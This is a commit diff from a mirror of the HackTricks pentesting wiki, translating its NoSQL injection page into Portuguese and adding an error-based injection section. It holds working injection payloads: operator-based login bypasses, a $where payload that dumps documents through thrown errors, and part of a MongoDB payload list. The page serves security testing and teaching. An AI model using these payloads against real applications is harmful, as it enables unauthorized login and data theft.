maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/pentesting-web/nosql-injection.md'] to pt

Browse Source
This commit is contained in:
Translator 2025-07-08 19:36:58 +00:00
parent c633199d55
commit f4af81244c
1 changed files with 11 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

15
src/pentesting-web/nosql-injection.md
View File

@ -1,4 +1,4 @@
# NoSQL injection # Injeção NoSQL
{{#include ../banners/hacktricks-training.md}} {{#include ../banners/hacktricks-training.md}}
@ -6,7 +6,7 @@
Em PHP, você pode enviar um Array mudando o parâmetro enviado de _parameter=foo_ para _parameter\[arrName]=foo._ Em PHP, você pode enviar um Array mudando o parâmetro enviado de _parameter=foo_ para _parameter\[arrName]=foo._
Os exploits são baseados em adicionar um **Operator**: Os exploits são baseados em adicionar um **Operador**:
```bash ```bash
username[$ne]=1$password[$ne]=1 #<Not Equals> username[$ne]=1$password[$ne]=1 #<Not Equals>
username[$regex]=^adm$password[$ne]=1 #Check a <regular expression>, could be used to brute-force a parameter username[$regex]=^adm$password[$ne]=1 #Check a <regular expression>, could be used to brute-force a parameter
@ -19,7 +19,7 @@ username[$nin][admin]=admin&username[$nin][test]=test&pass[$ne]=7 #<Matches non
``` ```
### Bypass de autenticação básica ### Bypass de autenticação básica
**Usando diferente de ($ne) ou maior que ($gt)** **Usando not equal ($ne) ou greater ($gt)**
```bash ```bash
#in URL #in URL
username[$ne]=toto&password[$ne]=toto username[$ne]=toto&password[$ne]=toto
@ -108,9 +108,15 @@ Usando o operador **$func** da biblioteca [MongoLite](https://github.com/agentej
} }
] ]
``` ```
### Injeção Baseada em Erro
Injete `throw new Error(JSON.stringify(this))` em uma cláusula `$where` para exfiltrar documentos completos via erros de JavaScript do lado do servidor (requer que a aplicação vaze erros de banco de dados). Exemplo:
```json
{ "$where": "this.username='bob' && this.password=='pwd'; throw new Error(JSON.stringify(this));" }
```
## MongoDB Payloads ## MongoDB Payloads
Lista [a partir daqui](https://github.com/cr0hn/nosqlinjection_wordlists/blob/master/mongodb_nosqli.txt) Lista [from here](https://github.com/cr0hn/nosqlinjection_wordlists/blob/master/mongodb_nosqli.txt)
``` ```
true, $where: '1 == 1' true, $where: '1 == 1'
, $where: '1 == 1' , $where: '1 == 1'
@ -229,5 +235,6 @@ get_password(u)
- [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection) - [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection)
- [https://nullsweep.com/a-nosql-injection-primer-with-mongo/](https://nullsweep.com/a-nosql-injection-primer-with-mongo/) - [https://nullsweep.com/a-nosql-injection-primer-with-mongo/](https://nullsweep.com/a-nosql-injection-primer-with-mongo/)
- [https://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb](https://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb) - [https://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb](https://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb)
- [https://sensepost.com/blog/2025/nosql-error-based-injection/](https://sensepost.com/blog/2025/nosql-error-based-injection/)
{{#include ../banners/hacktricks-training.md}} {{#include ../banners/hacktricks-training.md}}